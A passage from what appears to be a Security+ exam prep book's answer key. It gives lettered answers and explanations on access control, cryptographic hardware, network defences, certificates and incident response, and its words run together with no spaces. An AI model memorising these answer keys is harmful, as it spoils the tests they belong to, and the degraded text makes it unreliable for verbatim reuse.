cachingandtrafficmanipulation.Theyareoftenusedbycontentdeliverynetworkstohelpwithtrafficmanagement.

165. B. Thistypeofpotentialsecurityissueistypicallyrecordedasanimpossibletraveltime/riskyloginissue.Gurvinderwouldnotexpecttheusertohavetraveledbetweentwolocationsinanhour—infact,itisimpossibletodoso.ThatmeansheneedstocontacttheusertofindoutiftheymayhavedonesomethinglikeuseaVPN,oriftheiraccountmaybecompromised.Itispossiblethiscouldbeanissuewiththegeo-IPsystemthatGurvinder’scompanyuses,butheneedstotreatitlikeasecurityriskuntilhedeterminesotherwise,andacompromiseismorelikelyinmostcases.AmisconfiguredIPaddresswouldnotcausethisissue.

166. A. Discretionaryaccesscontrol(DAC)allowsdataownerstoassignpermissions.Role-basedaccesscontrol(RBAC)assignsaccessbasedontheroletheuserisin.Mandatoryaccesscontrol(MAC)isstricterandenforcescontrolattheOSlevel.Attribute-casedaccesscontrol(ABAC)considersvariousattributessuchaslocation,time,andcomputerinadditiontousernameandpassword.

167. A. OShardeningistheprocessofsecuringanoperatingsystembypatching,updating,andconfiguringtheoperatingsystemtobesecure.Configurationmanagementistheongoingprocessofmanagingconfigurationsforsystems,ratherthanthisinitialsecuritystep.Bothsecurityupliftandendpointlockdownweremadeupforthisquestion.

168. D. SecureLightweightDirectoryAccessProtocol(LDAPS)usesport636bydefault.DNSusesport53,LDAPuses389,andsecureHTTPusesport443.

169. C. ThebestanswerfortheneedsChrishasidentifiedisahardwaresecuritymodule,orHSM.HSMscanactasacryptographickeymanager,includingcreating,storing,andsecurelyhandlingencryptionkeysandcertificates.Theycanalsoactascryptographicaccelerators,helpingoffloadencryptionfunctionslikeTransportLayerSecurity(TLS)encryption.ATPM(TrustedPlatformModule)isadeviceusedtostorekeysforasystembutdoesnotoffloadcryptoprocessing,anditisusedforkeysonaspecificsystemratherthanbroaderuses.CPUsandGPUsmayhavecryptographicaccelerationfunctions,buttheydonotsecurelystoreormanagecertificatesandotherencryptionartifacts.

170. D. Ahost-basedintrusionpreventionsystem(HIPS)canmonitornetwork


traffictoidentifyattacks,suspiciousbehavior,andknownbadpatternsusingsignatures.Afirewallstopstrafficbasedonrules;antimalwaretoolsarespecificallydesignedtostopmalware,notattacksandsuspiciousnetworkbehavior;andahost-basedintrusiondetectionsystem(HIDS)canonlydetect,notstop,thesebehaviors.

171. B. Role-basedaccesscontrol(RBAC)grantspermissionsbasedontheuser’spositionwithintheorganization.Mandatoryaccesscontrol(MAC)usessecurityclassificationstograntpermissions.Discretionaryaccesscontrol(DAC)allowsdataownerstosetpermissions.Attribute-basedaccesscontrol(ABAC)considersvariousattributessuchaslocation,time,andcomputer,inadditiontousernameandpassword.

172. B. Measuredbootprovidesaformofbootattestationthatrecordsinformationabouteachcomponentloadedduringthebootprocess.Thisinformationcanthenbereportedtoaserverforvalidation.Trustedbootvalidateseachcomponentagainstaknownsignature.Measuredbootdoesnotcareaboutthetimetobootup,nordoesitupdatethesystem’sUnifiedExtensibleFirmwareInterface(UEFI).

173. D. Thekeydistributioncenter(KDC)issuestickets.Theticketsaregeneratedbytheticket-grantingservice,whichisusuallypartoftheKDC.Theauthenticationservicesimplyauthenticatestheuser,X.509certificatesandcertificateauthoritiesarenotpartofKerberos,andtheticket-grantingservicedoesgeneratetheticketbuttheKDCissuesit.

174. C. Althoughpatchingdevicesisimportant,themosteffectivewaytoprotectdevicesfrombeingattackedviaadministrativeaccountbruteforcingistoplacethedevicesonaseparatemanagementvirtualLAN(VLAN)andthencontrolaccesstothatVLAN.Thiswillpreventmostattackersfrombeingabletoconnecttothedevice’sadministrativeinterfaces.Disablingadministrativeaccessmaynotbepossible,andevenifitwas,itwouldcreatesignificantproblemswhenthedevicesneededtohavechangesmadeonthem.

175. A. Whilemobiledevicemanagement(MDM)andunifiedendpointmanagement(UEM)toolsprovidemanycapabilities,carrierunlockstatusnormallyneedstobecheckedwiththecarrierifyouwanttovalidatecorporate-ownedphoneswithoutmanuallycheckingeachdevice.

176. A. Zero-trustenvironmentstypicallyhaveamorecomplexnetworkduetoincreasedsegmentationtoisolatesystemsanddevicesthathavedifferent


securitycontexts.Zero-trustnetworksalsorequirestrongidentityandaccessmanagement,andtheyuseapplication-awarefirewallsextensivelytopreserveleastprivilege.Ofcourse,loggingandanalysisofsecurityeventsisnecessarytoensurethatissuesareidentifiedandrespondedto.

177. A. DigitalcertificatesusetheX.509standard(orthePGPstandard)andallowtheusertodigitallysignauthenticationrequests.OAuthallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.Itdoesnotusedigitalcertificatesorsupportdigitalsigning.Kerberosdoesnotusedigitalcertificates,nordoesitsupportdigitallysigning.Smartcardscancontaindigitalcertificatesbutdon’tnecessarilyhavetohavethem.

178. C. SAML(SecurityAssertionMarkupLanguage)isanExtensibleMarkupLanguage(XML)frameworkforcreatingandexchangingsecurityinformationbetweenpartnersonline.TheintegrityofusersistheweaknessintheSAMLidentitychain.Tomitigatethisrisk,SAMLsystemsneedtousetimedsessions,HTTPS,andSSL/TLS.LDAP(LightweightDirectoryAccessProtocol)isaprotocolthatenablesausertolocateindividualsandotherresourcessuchasfilesanddevicesinanetwork.TerminalAccessControllerAccessControlSystemPlus(TACACS+)isaprotocolthatisusedtocontrolaccessintonetworks.TACACS+providesauthenticationandauthorizationinadditiontoanaccountingofaccessrequestsagainstacentraldatabase.Transitivetrustisatwo-wayrelationshipthatisautomaticallycreatedbetweenaparentandachilddomaininaMicrosoftActiveDirectory(AD)forest.Itsharesresourceswithitsparentdomainbydefaultandenablesanauthenticatedusertoaccessresourcesinboththechildandparentdomains.

179. C. UEM,orunifiedendpointmanagement,managesdesktop,laptops,mobiledevices,printers,andothertypesofdevices.Mobiledevicemanagement(MDM)toolsfocusonmobiledevices.

180. B. Host-basedfirewallsarethefirststepinmostdesignswhenprotectingagainstnetwork-bornethreats.Theycanpreventunwantedtrafficfromenteringorleavingthehost,leavinglesstrafficforahost-basedintrusionpreventionsystem(HIPS)orothertoolstoanalyze.Full-diskencryption(FDE)willnotstopnetwork-bornethreats,andantivirusfocusesonpreventionofmalware,notnetworkthreatslikedenialofserviceorexploitationofvulnerableservices.


181. A. Securitygroupsareavirtualfirewallforinstances,allowingrulestobeappliedtotrafficbetweeninstances.Dynamicresourceallocationisaconceptthatallowsresourcestobeappliedastheyareneeded,includingscalingupanddowninfrastructureandsystemsonthefly.Virtualprivatecloud(VPC)endpointsareawaytoconnecttoservicesinsideofacloudproviderwithoutanInternetgateway.Finally,instanceawarenessisaconceptthatmeansthattoolsknowaboutthedifferencesbetweeninstances,ratherthantreatingeachinstanceinascalinggroupasthesame.Thiscanbeimportantduringincidentresponseprocessesandsecuritymonitoringforscaledgroups,whereresourcesmayallappearidenticalwithoutinstanceawareness.

182. D. Althoughbuilt-inupdatetoolswillhandletheoperatingsystem,additionalsoftwareinstalledonsystemsneedstobepatchedseparately.Third-partysoftwareandfirmware,includingtheUnifiedExtensibleFirmwareInterface(UEFI)orBIOSofthesystemsthataredeployedinDerek’sorganization,willneedregularupdates.ManyorganizationsadoptpatchmanagementplatformsorsystemmanagementplatformswithpatchingcapabilitiestoensurethatthisoccursonabroaderbasisthanjustOSpatches.

183. A. IDSs,orintrusiondetectionsystems,canonlydetectunwantedandmalicioustrafficbasedonthedetectionrulesandsignaturesthattheyhave.Theycannotstoptrafficormodifyit.AnIPS,orintrusionpreventionsystem,thatisplacedinlinewithnetworktrafficcantakeactiononthattraffic.Thus,IDSsareoftenusedwhenitisnotacceptabletoblocknetworktraffic,orwhenataporothernetworkdeviceisusedtoclonetrafficforinspection.

184. C. Althoughinsiderthreatsareaconcern,they’renotanydifferentforcontainersthananyothersystem.Ensuringcontainerhostsecurity,securingthemanagementstack,andmakingsurethatnetworktraffictoandfromcontainersissecureareallcommoncontainersecurityconcerns.

185. C. Networkaddresstranslation(NAT)gatewaysallowinternalIPaddressestobehiddenfromtheoutside,preventingdirectconnectionstosystemsbehindthem.ThiseffectivelyfirewallsinboundtrafficunlessthegatewayissettopasstraffictoaninternalhostwhenaspecificIP,port,andprotocolisused.Theyarenotafirewallinthetraditionalsense,however,anddonotspecificallystatefullyblocktrafficbyportandprotocol,nordotheydetectmalicioustraffic.Finally,NATgatewaysarenotusedtosend


non-IPtrafficouttoIPnetworks.

186. C. Conditionalaccessassessesspecificconditionstomakeadeterminationaboutwhethertoallowanaccounttoaccessaresource.Thesystemmaychoosetoallowaccess,toblockaccess,ortoapplyadditionalcontrolsbasedontheconditionsthatarepresentandtheinformationthatisavailableaboutthelogin.

187. B. Ifthesystemmaintainsapasswordhistory,thatwouldpreventanyuserfromreusinganoldpassword.Passwordcomplexityandlengtharecommonsecuritysettingsbutwouldnotpreventthebehaviordescribed.Multifactorauthenticationhelpspreventbrute-forceattacksandreducesthepotentialimpactofstolenpasswordsbutwouldnothelpwiththisscenario.

188. D. BridgeProtocolDataUnit,orBDPU,guardprotectsnetworkinfrastructurebypreventingunknowndevicesfromparticipatinginspanningtree.Thatpreventsanewswitchaddedbyauserfromclaimingtobetherootbridge(inthiscase,SwitchC),whichwouldnormallycauseatopologychangeandfortraffictobesenttoSwitchX,anundesirableresult.802.11nisawirelessprotocol,andtheremainingoptionsweremadeupforthisquestion.

189. A. Thenetusercommandallowsthiscontroltobeputinplace.Althoughyoumaynotbefamiliarwiththemanynetusercommands,youcantakeoutunrealisticcommandsorcommandswithflawsinthem.Forexample,hereyoucouldlikelyguessthat-working-hoursisn’tadefinedterm.Inthesameway,loginisn’taWindowscommand,butnetcommandsarecommonlyusedtocontrolWindowssystems.

190. A. Auditingandreviewinghowusersactuallyutilizetheiraccountpermissionswouldbethebestwaytodetermineifthereisanyinappropriateuse.Aclassicexamplewouldbeabankloanofficer.Bythenatureoftheirjob,theyhaveaccesstoloandocuments.Buttheyshouldnotbeaccessingloandocumentsforloanstheyarenotservicing.Theissueinthiscaseisnotpermissions,becausetheusersrequirepermissiontoaccessthedata.Theissueishowtheusersareusingtheirpermissions.Usageauditingandpermissionsauditingarebothpartofaccountmaintenance,butauditingandreviewisabetteranswer.Finally,thisisnotapolicyissue.

191. B. AscenariosuchasguestWi-Fiaccessdoesnotprovidetheloginswithanyaccesstocorporateresources.ThepeoplelogginginmerelygettoaccesstheInternet.Thisposesverylimitedsecurityrisktothecorporate


networkandthusisoftendonewithacommonorsharedaccount.Techsupportpersonnelgenerallyhavesignificantaccesstocorporatenetworkresources.Althoughthisisarelativelylowaccessscenario,itisstillimportanttoknowwhichspecificstudentisloggingonandaccessingwhatresources.Anylevelofaccesstocorporateresourcesshouldhaveitsownindividualloginaccount.

192. B. Certificatechainslistcertificatesandcertificateauthority(CA)certificates,allowingthosewhoreceivethecertificatetovalidatethatthecertificatescanbetrusted.Aninvalid,orbroken,chainmeansthattheuserorsystemthatischeckingthecertificatechainingshouldnottrustthesystemandcertificate.

193. D. 802.1XistheIEEEstandardforport-basednetworkaccesscontrol.Thisprotocolisfrequentlyusedtoauthenticatedevices.ChallengeHandshakeAuthenticationProtocol(CHAP)isanauthenticationprotocolbutnotthebestchoicefordeviceauthentication.Kerberosisanauthenticationprotocolbutnotthebestchoicefordeviceauthentication.802.11iistheWi-FisecuritystandardandisfullyimplementedinWPA2andWPA3.Itisnotadeviceauthenticationprocedure.

194. A. WPA2usestheAES-basedCCMP,orCounterModeBlockChainingMessageAuthentication(CBC-MAC)Protocoltoencapsulatetraffic,providingconfidentiality.WPA3alsousesCCMPastheminimumacceptableencryptioninWPA3-Personalmode.WEP,infrared,andBluetoothdonotuseCCMP.

195. A. SimpleNetworkManagementProtocol(SNMP)wouldgiveanattackeragreatdealofinformationaboutyournetwork.SNMPshouldnotbeexposedtounprotectednetworks,SNMPv3shouldbeimplemented,andSNMPsecuritybestpracticesshouldbefollowed.BothPOP3andIMAPareemailaccessprotocols,andDynamicHostConfigurationProtocol(DHCP)isusedtohandoutdynamicIPaddresses.

196. C. Accountsshouldlockoutafterasmallnumberofloginattempts.Threeisacommonnumberofattemptsbeforetheaccountislockedout.Thispreventssomeonefromjustattemptingrandomguesses.Passwordagingwillforceuserstochangetheirpasswordsbutwon’taffectpasswordguessing.Longerpasswordswouldbehardertoguess,butthisoptionisnotaseffectiveasaccountlockoutpolicies.Accountusageauditingwon’thaveanyeffectonthisissue.


197. A. SecurityAssertionMarkupLanguage(SAML)isanXML-based,openstandardformatforexchangingauthenticationandauthorizationdatabetweenparties.OAuthallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.RADIUSisaremoteaccessprotocol.NewTechnologyLANManager(NTLM)isnotXML-based.

198. A. ChallengeHandshakeAuthenticationProtocol(CHAP)wasdesignedspecificallyforthispurpose.Itperiodicallyreauthenticates,thuspreventingsessionhijacking.NeitherPasswordAuthenticationProtocol(PAP)norTACACS+preventssessionhijacking,andRADIUSisaprotocolforremoteaccess,notauthentication.

199. C. IPSecvirtualprivatenetworks(VPNs)canmakearemotelocationappearasthoughitisconnectedtoyourlocalnetwork.SinceGregneedstorelyonastreamingsecuritycamera,analways-onIPSecVPNisthebestsolutionlisted.TLS(SSL)VPNsareprimarilyusedforspecificapplications,typicallyfocusingonwebapplications.

200. B. TheOpalstoragespecificationdefineshowtoprotectconfidentialityforstoreduserdataandhowstoragedevicesfromstoragedevicemanufacturerscanworktogether.OPALdoesnotspecifydetailsorprocessesforlicenses,accounts,andlibraries,ordegaussers.

201. B. UEFISecureBootcheckseverybinarythatisloadedduringboottomakesurethatitshashisvalid,bycheckingagainsteitheralocallytrustedcertificateorachecksumonanallowlist.Itdoesnotprotectagainstwormsthatmightattackthosebinaries,nordoesitdirectlycheckthesystemBIOSversion.

202. C. OpenIDConnectworkswiththeOAuth2.0protocolandsupportsmultipleclients,includingweb-basedandmobileclients.OpenIDConnectalsosupportsREST.ShibbolethisamiddlewaresolutionforauthenticationandidentitymanagementthatusesSAML(SecurityAssertionMarkupLanguage)andworksovertheInternet.RADIUSisaremoteaccessprotocol.OAuthallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.

203. D. Anomaly-baseddetectionsystemsbuildabehavioralbaselinefornetworksandthenassessdifferencesfromthosebaselines.Theymayuseheuristiccapabilitiesontopofthose,butthequestionspecificallyasksaboutbaselinedoperationspointingtoananomaly-basedsystem.Heuristic-


baseddetectionslookforbehaviorsthataretypicallymalicious,andsignature-basedorhash-baseddetectionslookforknownmalicioustoolsorfiles.

204. B. ATrustedPlatformModule,orTPM,isusedasthefoundationforahardwarerootoftrustformodernPCs.TheTPMmayprovideacryptographickey;aPUF,orphysicallyunclonablefunction;oraserialnumberthatisuniquetothedevice.TheCPUandharddrivearenotusedforthisfunction,andHSMs,orhardwaresecuritymodules,areusedforpublickeyinfrastructure(PKI)andcryptographicpurposesbutnotasahardwarerootoftrustforPCs.

205. C. Next-generationfirewallstypicallybuildinadvancedcapabilitieslikeURLfiltering,blacklisting,andotherapplication-layercapabilitiesbeyondsimplepacketfilteringorstatefulpacketinspection.

206. D. Mobileapplicationmanagement(MAM)toolsarespecificallydesignedforthispurpose,andtheyallowapplicationstobedeliveredto,removedfrom,andmanagedonmobiledevices.MOMistheMicrosoftOperationsManager,asystemsmanagementtoolthatMicrosofthasreplacedwithOperationsManagerincurrentuse.MLMoftenmeansmultilevelmarketing,orpyramidschemes—notasecurityterm.MIMisnotasecurityterm.

207. A. Cloudapplicationshavemanyofthesameconcernsason-premisesapplications,butcompromiseofthesystemrunningtheapplicationduetolocalaccessisafarlesslikelyscenario.Cloudapplicationvendorsaremorelikelytooperateinsecuredatacenterswithlimitedornoaccesstotheserversexceptforauthorizedpersonnel,greatlyreducingthelikelihoodofthistypeofsecurityissue.

208. D. Themostcriticalpartofacertificateauthority(CA)isitsrootcertificate,andensuringthattherootcertificateisneverexposediscriticaltotheongoingoperatingofthatCA.Thus,rootCAsareoftenmaintainedasofflineCAs,makingitfarharderforanattackertocompromisethesystemandgainaccesstotherootcertificate.Inpractice,compromisedCAsmaylosethetrustoforganizationsaroundtheworldandbeunabletocontinuetodobusiness.

209. C. Split-tunnelVPNssendonlytrafficdestinedfortheremotenetworkovertheVPN,withallothertrafficsplitawaytousetheVPNsystemorauser’sprimarynetworkconnection.Thisreducesoveralltrafficsentthrough


theVPNbutmeansthattrafficcannotbemonitoredandsecuredviatheVPN.Half-pipeisnotasecurityterm,andsplithorizonismostoftenusedtodescribeDNSwhereaninternalandexternalDNSviewmaybedifferent.

210. A. Loopprotectionlooksforexactlythistypeofissue.LoopprotectionsendspacketsthatincludeaPDU,orprotocoldataunit.Thesearedetectedbyothernetworkdevicesandallowthenetworkdevicestoshutdownportsfromwhichtheyreceivethosepackets.Theremainingoptionsweremadeupforthisquestion.

211. C. Over-the-air(OTA)updatesareusedbycellularcarriersaswellasphonemanufacturerstoprovidefirmwareupdatesandupdatedphoneconfigurationdata.Mobiledevicemanagement(MDM)toolscanbeusedtomonitorforthecurrentfirmwareversionandphonesettingsandwillallowCharlestodetermineifthephonesthathisstaffuseareupdatedtoensuresecurity.Anetworkaccesscontrol(NAC)agentmightcapturesomeofthisdatabutonlyfornetwork-connectedphones,whichwillnotcoveroff-sitephones,thosewithWi-Fiturnedoff,orremotedevices.OTAisnotspecificallyawaytoupdateencryptionkeys,althoughfirmwareorsettingsmightincludethem.OTAisnotsentbythephonesthemselves.

212. C. Opensourcefirewallstypicallydonothavethesamelevelofvendorsupportandmaintenancethatcommercialfirewallsdo.Thatmeansyoudon’thaveavendortoturntoifsomethinggoeswrong,andyouwillbereliantonasupportcommunityforpatchesandupdates.Opensourcefirewallsaretypicallylessexpensive,theiropensourcenaturemeansthatthecodecanbevalidatedbyanybodywhocarestoexamineit,anditcanbeacquiredasquicklyasitcanbedownloaded.

213. C. WPA3personalreplacedPSK,orpresharedkeys,withSAE,orsimultaneousauthenticationofequals.SAEhelpstopreventbrute-forceattacksagainstkeysbymakingattackersinteractwiththenetworkbeforeeachauthenticationattempt.Thisslowsdownbrute-forceattacks.WPA3alsoincludesa192-bitencryptionmode.Itdoesnotreplace64-bitencryptionwith128-bitencryption,addper-channelsecurity,oradddistributeddenial-of-service(DDoS)monitoringandprevention.

214. B. SecurityEnhancedLinux(SELinux)allowsmandatoryaccesscontrolforLinux-basedsystems,andSEAndroidisanAndroidimplementationofSELinux.ThatmeansthatIsaaccanuseSEAndroidtoaccomplishhisgoals.Androiddoesusearegistry,butthereisnoMACmode.MACDroid


wasmadeupforthisquestion,andsingle-usermodedoesnotmakeAndroidaMAC-basedsystem.

215. B. Thesystemdescribedisaprivilegedaccessmanagement(PAM)system.PAMsystemsareusedtomanageandcontrolprivilegedaccountssecurely.MACisanaccesscontrolschemethatenforcesaccessattheOSlevel.FDEisfull-diskencryption,andTLSisTransportLayerSecurity.

216. A. Usingamobiledevicemanagement(MDM)toolthatallowscontrolofthedeviceswouldallowAlainatolockoutthecameras,preventingstaffmembersfromusingtheAndroidtabletstotakepictures.Shewouldstillneedtoensurethatherstaffdidnotbringtheirowncameraequippeddevicesintothefacility.DLPisdatalossprevention,OPALisanencryptionstandardfordrives,andMMChasanumberofmeanings,includingmultimediacardsandMicrosoftManagementConsolesnap-insforWindowssystems,noneofwhichwouldprovidethecontrolsheneeds.

217. C. Auniversalendpointmanagement(UEM)toolcanmanagedesktops,laptops,mobiledevices,printers,andotherdevices.UEMtoolsoftenuseapplicationsdeployedtomobiledevicestoconfigureandmanagethem,andOlivia’sbestoptionfromthislistisaUEMtool.ACASBisacloudaccesssecuritybrokerandisnotusedtomanagemobiledevices,andtheotheroptionsrequiremassiveamountsofmanualworkandareunlikelytosucceed—oruserswillsimplychangesettingswhenitisconvenienttothem.

218. C. Next-generation(NG)securewebgateways(SWG)addadditionalfeaturesbeyondthosefoundincloudaccesssecuritybrokersandnextgenerationfirewalls.Whilefeaturescanvary,theymayincludewebfiltering,TLSdecryptiontoallowtrafficanalysisandadvancedthreatprotection,cloudaccesssecuritybroker(CASB)features,datalossprevention(DLP),andotheradvancedcapabilities.Thistypeofsolutionisarelativelynewone,andthemarketischangingquickly.

219. C. Accesspoliciesarebuiltusinginformationandattributesaboutaccessrequests.Ifthepolicyrequirementsaremet,theactionslikeallowingordenyingaccess,orrequiringadditionalauthenticationstepscanbeperformed.Geolocationandtime-basedloginsfocusonasingleinformationcomponent,andaccountauditingisusedtoreviewpermissionsforaccounts,nottoperformthistypeofvalidationorpolicy-basedcontrol.

220. B. Numericrepresentationsoffilepermissionsarecommonlyusedinstead


ofusingrwxnotationwithchmod.A7setsfullpermissions,andthefirstnumbersetstheuser’srights,meaningthatheretheuserwillbegrantedfullaccesstothefile.

221. B. Certificatepinningassociatesaknowncertificatewithahostandthencomparesthatknowncertificatewiththecertificatethatispresented.Thiscanhelppreventman-in-the-middleattacksbutcanfailifthecertificateisupdatedandthepinnedcertificateisn’t.ACRL,orcertificaterevocationlist,wouldshowwhetherthecertificatehasbeenrevoked,butitwouldnotshowifitwaschanged.Patrickwillnothaveaccesstotheremoteserver’sprivatekeyunlesshehappenstobetheadministrator.

222. C. PrivacyEnhancedMail(PEM)isthemostcommonformatissuedbycertificateauthorities.DistinguishedEncodingRules(DER)formatisabinaryformoftheASCIItextPEMformat.PKCS#7orP7BformatisBase64ASCII,andPKCS#12,orPFX,formatisbinaryformatusedtostoreservercertificates,intermediatecertificates,andprivatekeysinasinglefile.

223. C. Michelle’sonlyoptionistoremovethecertificatefromthelistoftrustedcertificatesoneverymachinethattrustedit.Thiscanbetime-consuminganderrorprone,andit’sonereasonself-signedcertificatesareavoidedinproductionatmanyorganizations.

224. D. ChangingtheIPaddressesassociatedwithadomaintoanarbitraryvaluecouldcauseroutingorotherproblems.ThatmeansthatchangingtheIPaddresswouldnotbeachosenmethodofvalidatingadomain.Theremainingoptionsarelegitimateandnormalmeansofvalidationforcertificates.

225. A. SNMPv3addstheabilitytoauthenticateusersandgroupsandthenencryptmessages,providingmessageintegrityandconfidentiality.ItdoesnothaveSQLinjectionpreventionbuiltin,butitalsoisn’taprotocolwhereSQLinjectionwilltypicallybeaconcern.

226. A. Thisdiagramshowsareverseproxy.Areverseproxytakesconnectionsfromtheoutsideworldandsendsthemtoaninternalserver.Aforwardproxytakesinternalconnectionsandsendsthemtoexternalservers.Round-robinandnext-generationproxiesarenottypesofproxies,althoughround-robinisaformofloadbalancing.


Chapter4:OperationsandIncidentResponse1. A. Milashouldselectahashbecauseahashisdesignedtobeuniqueto

eachpossibleinput.Thatmeansthatmultiplefilescouldhavethesamechecksumvalue,whereasahashingalgorithmwillbeuniqueforeachfilethatitisrunagainst.

2. A. Allowlistsarelistsofapprovedsoftware.Softwarecanonlybeinstalledifitisonanallowlist.Denylistsblockspecificapplications,buttheycannotaccountforeverypossiblemaliciousapplication.Accesscontrollists(ACLs)determinewhocanaccessaresource.Ahostintrusiondetectionsystem(HIDS)doesnotpreventsoftwarefrombeinginstalled.

3. C. Correlationdashboardsareusedtoaggregateeventsandtoseekoutconnections.Insomecases,thisisdonewithadvancedanalyticalgorithms,includingartificialintelligence(AI)andmachinelearning(ML).Anetworkintrusiondetectionsystem(NIDS)wouldbehelpfulbutwillnot(byitself)necessarilycorrelateevents.Apublickeyinfrastructure(PKI)handlescertificates,notcorrelationandvisibilityofsecurityevents.Trenddashboardswouldshowhowthingsaregoingandwhichwaystatisticsandinformationaremoving.

4. D. Usingtcpdumpwithflagslike-itosettheinterface,tcptosettheprotocol,andporttosettheportwillcaptureexactlythetrafficEmilyneedstocapture.Port443isthedefaultHTTPSport.Thereisno-protoflagfortcpdump.

5. A. Tabletopexercisesareusedtotalkthroughaprocess.Unlikewalk-throughs,whichfocusonstep-by-stepreviewofanincident,Milawillfocusmoreonhowherteamrespondsandonlearningfromthoseanswers.Atabletopexercisecaninvolvegamingoutasituation.Asimulationactuallyemulatesaneventorincident,eitheronasmalloralargescale.DrillsarenotdefinedaspartoftheSecurity+examoutline.

6. A. Backupsareconsideredtobetheleastvolatiletypeofstoragesincetheychangeatamuchslowerpaceand,infact,maybeintentionallyretainedforlongperiodsoftimewithoutchanging.Inthislist,CPUcachewillchangethemostfrequently,thenRAM,thenlocaldiskcontents.

7. C. Incidentrespondersknowthatscanresultscanshowvulnerablesystemsandservices,providingcluesabouthowattackersmayhave


obtainedaccesstosystems.Thescanswillnotshowtheprogramstheattackersusedbutmayshowservicesthattheyhaveenabledorchanged.Thescanswillshowtheversionsofsoftwareinstalledbeforetheattack,butthatinformationisonlyusefuliftheattackerseitherupgradedorchangedthesoftwareorthesoftwarewasvulnerable,makingthisalessaccurateandusefulanswer.Finally,thescansmayshowwherenetworksecuritydevicesare,butthatinformationshouldbeavailabletotheincidentresponseteamwithouttryingtofigureitoutfromscans.

8. C. Aftereradicationoftheissuehasbeencompleted,recoverycanbegin.Recoverycanincluderestorationofservicesandareturntonormaloperations.

9. C. The-pflagaddsapersistentroutewhencombinedwiththeADDcommand.Persistentrouteswillremainintheroutingtablebetweenboots.Bydefault,theyareclearedateachboot.Anattackermaychoosetousethistohelpwithanon-path(man-in-the-middle)attack.

10. D. Oftheoptionsprovided,onlytheHarvesterisanopensourceintelligencetool.Curlisatoolusedtotransferdata,hpingisatoolthatisfrequentlyusedtobuildcustompacketsandtoperformpacketanalyzerfunctions,andnetcatisautilitythatallowsyoutoreadandwritetonetworkconnections,makingitabroadlyusedtoolforpentestersandattackerswhoneedtotransferdatausingasmall,capableutility.

11. C. TheMITREATT&CKframeworkfocusesontechniquesandtacticsanddoesnotfocusonaspecificorderofoperationsliketheCyberKillChaindoes.ItalsocoversabroaderrangeoftechniquesandadversariesthantheDiamondModeldoesandisbroadlyimplementedinmanyexistingtools.TheCVSSstandardisavulnerabilityscoringsystemandisnotausefulframeworkforanalyzingmalwareandattacks.

12. D. Toproperlypreservethesystem,Tedneedstoensurethatitdoesnotchange.Turningthesystemoffwillcauseanythinginmemorytobelost,whichmaybeneededfortheinvestigation.Removingthedrivewhileasystemisrunningcancausedatatobelost.Instead,liveimagingthemachineanditsmemorymayberequired.Allowinguserstocontinuetouseamachinewillresultinchanges,whichcanalsodamageTed’sabilitytoperformaforensicinvestigation.

13. D. Containmenteffortsareusedtolimitthespreadorimpactofanincident.Containmentmayfocusonkeepingsystemsorservicesonlineto


ensurethatorganizationscancontinuetofunctionuntilotheroptionsforbusinesscontinuitycanbeimplemented.Segmentationmovessystemsorservicesintodifferentsecurityzones,andisolationremovesthemfromallcontactorputstheminsmallgroupsthatareremovedfromtherestoftheorganizationandsystemsthatarenotimpacted.

14. D. Windowsdoesnotlognetworktrafficatalevelofgranularitythatwillshowifafilehasbeenuploaded.Basictrafficstatisticscanbecaptured,butwithoutadditionalsensorsandinformationgatheringcapabilities,JessicawillnotbeabletodetermineiffilesaresentfromaWindowssystem.

15. C. Thechainofcustodyinforensicactivitiestrackswhohasadevice,data,orotherforensicartifactatanytime,whentransfersoccur,whoperformedanalysis,andwheretheitem,system,ordevicegoeswhentheforensicprocessisdone.Evidencelogsmaybemaintainedbylawenforcementtotrackevidencethatisgathered.Papertrailanddigitalfootprintarenottechnicaltermsusedfordigitalforensics.

16. A. Ofthelistedtools,onlynmapisaportscanner,andthusitisthetoolthatwillprovidetherequiredinformation.routeisacommand-linetooltoviewandaddnetworktrafficroutes.hpingisapacketgeneratorandanalyzer,andnetstatisacommand-linetoolthatshowsnetworkconnections,interfacestatistics,andotherusefulinformationaboutasystem’snetworkusage.

17. B. The-cflagforgrepcountsthenumberofoccurrencesforagivenstringinafile.The-nflagshowsthematchedlinesandlinenumbers.Evenifyou’renotsureaboutwhichflagiswhich,thesyntaxshouldhelponaquestionlikethis.Whenusinggrep,thepatterncomesbeforethefilename,allowingyoutoruleouttwooftheoptionsrightaway.

18. B. Stakeholdermanagementinvolvesworkingwithstakeholders,orthosewhohaveaninterestintheeventorimpactedsystemsorservices.COOP,orContinuityofOperationsPlanning,isaU.S.federalgovernmentefforttoensurethatfederalagencieshavecontinuityplans.PAMisprivilegedaccountmanagement.Stakeholdermanagementinvolvesmorethanjustcommunications,althoughcommunicationsisanimportantpartofit.

19. D. Themostcommonreasonforaone-hourtimeoffsetbetweentwosystemsinthesamelocationisafaultytimezonesettingcreatingatimeoffsetbetweenthesystems.

20. C. DNSdataisfrequentlyloggedtohelpidentifycompromisedsystemsor


systemsthathavevisitedknownphishingsites.DNSlogscanbeusedalongwithIPreputationandknownbadhostnameliststoidentifyissueslikethese.DNSdataisnotcommonlyusedtoidentifynetworkscansandcannotcapturethem.Domaintransfersarenotattacks,althoughtheyareinformationgatheringandwillshowinthelogs.DNSdoesnotcaptureinformationaboutlogins.

21. D. Evenifyou’renotdeeplyfamiliarwiththeopensslcommand-lineutility,youshouldknowthatcertificatesuseciphersthatacceptabitlengthasaflagandthatbitlengthslike1024,2048,and4096arecommon.Thesekeylengthsarenotcommonlycommunicatedinbytes,andcertificatesareunlikelytolastformultipledecades,althoughacertificateauthority(CA)rootcertificatecanlastforalongtime.

22. B. Bydefault,thetailcommandshowsthelast10linesofafile,andusingthe-fflagfollowschangesinthefile.headshowsthetopofafile,andfootandfollowweremadeupforthisquestion.

23. B. Althoughfirmwareacquisitionisalesscommonlyusedtechnique,firmwareistypicallystoredinachiponasystemboardratherthanondisk.Henryismostlikelytosucceedifheretrievestherunningfirmwarefrommemory.Aserialconnectionmayworkbutwouldtypicallyrequirerebootingthesystem.

24. B. NetworkflowsusingNetFloworsFlowwouldprovidetheinformationthatEricwants,withdetailsofhowmuchtrafficwasused,when,andwheretrafficwasdirected.Afirewallordatalossprevention(DLP)wouldnotshowthebandwidthdetail,althoughafirewallmayshowtheconnectioninformationforevents.Packetflowwasmadeupforthisquestionandisnotatechnologyusedforthispurpose.

